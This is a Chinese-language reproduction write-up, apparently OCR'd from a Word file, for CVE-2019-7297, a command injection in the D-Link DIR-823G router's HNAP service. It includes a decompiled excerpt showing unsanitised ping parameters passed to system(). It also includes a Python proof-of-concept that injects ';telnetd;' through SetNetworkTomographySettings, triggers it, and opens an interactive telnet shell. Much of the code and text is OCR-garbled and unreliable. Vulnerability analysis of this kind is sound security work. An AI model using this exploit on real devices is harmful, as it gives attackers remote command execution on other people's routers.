（CVE-2019-7297）D-Link DIR-823G 命令注入漏洞.docx

(CVE-2019-7297) D-Link DIR-823G 命令注入漏洞一、漏洞简介D-Link DIR 823G 1.02B03及之前的版本中存在命令注入漏洞，攻击者可通过发送 带有shell元字符的特制/HNAPl请求利用该漏洞执行任意的操作系统命令。GetNetworkTomographyResult函数中调用system函数，执行的内容中包括不受 信任的用户输入AddreSS字段，攻击者可以远程执行任意命令。二、漏洞影响D-Link DIR 823G 1.02B03 及之前的版本三、复现过程漏洞分析漏洞原理中提到的GetNetworkTOniographyResult函数是在goahead二进制文件 中实现的。在FunctionJist中找到对应而函数地址。GetNetWOrkTOmOgraPhyReSUIt 获取 address, number, SiZe 参数，作为 Ping 的 参数。,rr . ajub_get <0mH)72,;if (War： O)(puts ("error, ap&xto get MIB-PIG-ADDRtSS! ： )else (9nprlntf(a L “W，6Jp:ng *);_n rrlen(address);atmcat(acStack280faddrMf-n) j1 Va： apaib_get(3xlb731«* .rr:)：If (Vrl « 0> (puts Cerror, pmb get MIBePINGeNUMBEK");)else (strcat(acStack2S2r* -c w);>prlntf(char )$ ,：-Qd -v drnuxer trlen(char )，9Wic ；-, (char ) 4.,Varl psabs9ec(0xU>749size);if (Varl - O) put.sC,error, epoxb get MIB_PIHG_5XZf); ) else (9trcAt<ft: tac<-: rw -9 );sprlntf(char )_二JW.e:工20);_n *rlen(char )loc<1_120);trac4t(< ： 3 r (car )t._： ,_:,“9trct<% c*a ：:t > tappng.tx 2>>txppng.tx);Puts(AcStazaJIfiC);syaten(- :Sta：c2eo);_3tr*ar - fopen(auppng.txt*v r>If (_itreax <1X *>0x0)(puts(tppng.tMt is NULL")：ping address -c number -w number -s size > tmpping.txt 2>>tmpping.t ×t但在system之前并没有对这些外来参数进行检查，如果address为;telnetd;就 能启动Telnet服务。可以看出这些参数都是通过apmib_get获取的，那么在之前 一定有apmib_set进行设置，在IDA中查找关键字0xlb72, 0xlb73, 0xlb73, 定位到apmib_set的位置，结合ghidra的反汇编代码，确定在 SetNetworkTomographySettings函数中可以对这些参数进行设置。,4tl H*lLo>S3%rin9(0tlFnC. "?pocimport requests from pwn import *IP='192.168.0.1, headers = requests. utils. default_headers()headers"User- Agent" = ',Mozilla5.0 (Windows NT 10.0; Win64; ×64) Appl eWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36 headers"SOAPAction" = ," raphySettings'headers,Content-Type" = "te×t×ml; Charset=UTF-8"headers"Accept"="*/*"headers"Accept-Encoding"="gzip, deflate"headers "Accept-Language "=',zh-CNj zh;q=0.9,en;q=0.8" payload = '<?xml version=,1.0,* encoding="utf-8" ?><soap: Envelope xmlns:x si=,http:/www.w3.org2001XMLSchema-instance" xmlns:xsd="http:/www.w3.org2001XMLSchema" xmlns:soap="http:/schemas.xmlsoap.org/soap/envelop e"><soap:Body><SetNetworkTomographySettings xmlns="HNAPl "><Address>jtelnetd;<Address><Number>4<Number><Size>4<Size><SetNetworkTomographySettings><soap:Body><soap:Envelope>,r = requests.post(,http:/'+IP+'HNAP1,i headers=headers data=payload) print r.textheaders"SOAPAction" = ,"http:/ZHNAPlGetNetworkTomog raphyResult",payload = " <?xml version=,1.0" encoding="utf-8" ?><soap: Envelope xmlns :x si=,http:/www.w3.org2001XMLSchema-instance" ×mlns:xsd="http:/www.w3. org2001XMLSchema" xmlns:soap=,http:/schemas.xmlsoap.org/soap/envelop e"><soap:Body><GetNetworkTomographyResult xmlns=,http:/HNAPl> <GetNetworkTomographyResult><soap:Body><soap:Envelope>'r = requests.post('http:/,+IP+'HNAP1,i headers=headersj data=payload) print r.text p=remote(IP,23) p.interactive(